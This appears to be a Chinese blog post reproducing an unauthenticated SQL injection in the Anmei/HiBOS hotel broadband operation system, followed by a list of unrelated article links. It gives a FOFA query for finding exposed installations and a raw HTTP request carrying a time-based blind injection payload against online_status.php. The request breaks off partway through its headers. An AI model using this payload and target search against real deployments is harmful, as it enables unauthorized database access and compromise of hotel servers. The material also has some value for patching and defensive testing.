当前位置: 首页 > article >正文

安美数字酒店宽带运营系统 SQL注入漏洞复现

0x01 产品简介

HiBOS酒店宽带运营系统隶属于安美世纪(北京)科技有限公司开发的一套酒店宽带管理系统。

0x02 漏洞概述

 安美数字酒店宽带运营系统 online_status.php、language.php等接口处存在SQL注入漏洞,未经身份认证的攻击者可以通过此漏洞获取数据库权限,进一步利用可导致服务器失陷。

0x03 复现环境

FOFA:app="安美数字-酒店宽带运营系统"

0x04 漏洞复现 

PoC-1

GET /manager/frontdesk/online_status.php?AccountID=1%27+AND+%28SELECT+6097+FROM+%28SELECT%28SLEEP%285%29%29%29ClPT%29--+lMyr HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Conn

http://www.kler.cn/a/158350.html

相关文章:

  • 全国停车位收费标准接口API
  • 代码随想录刷题题Day6
  • 01_阿里云_Xshell连接服务器
  • Python之元祖(tuple)基础知识点
  • 使用DGL实现GAT(并在6个节点的2分类图中进行简单应用)
  • 基于vue+node.js智慧校园学生办证系统
  • uniapp快速入门大纲,带你入门并具备开发基本应用的能力
  • 博客访问量到达2万了!
  • 【Trino权威指南(第二版)】Trino介绍:trino解决大数带来的问题
  • 文心一言 VS 讯飞星火 VS chatgpt (150)-- 算法导论12.2 6题
  • struct queue_limits结构体参数学习
  • 华为无线配置模板 一
  • Chrome清除特定网站的Cookie,从而让网址能正常运行(例如GPT)
  • Node包管理工具 - nvm、npm、yarn、cnpm、pnpm
  • centos 7.9 二进制部署 kubernetes v1.27.7
  • 第二节JavaScript 语法、语句、注释、变量、数据类型等
  • new Promise用法
  • ES-环境安装(elasticsearch:7.17.9,kibana,elasticsearch-head)
  • Python小案例:打印三角形
  • 一篇吃透大厂面试题,2024找工作一帆风顺。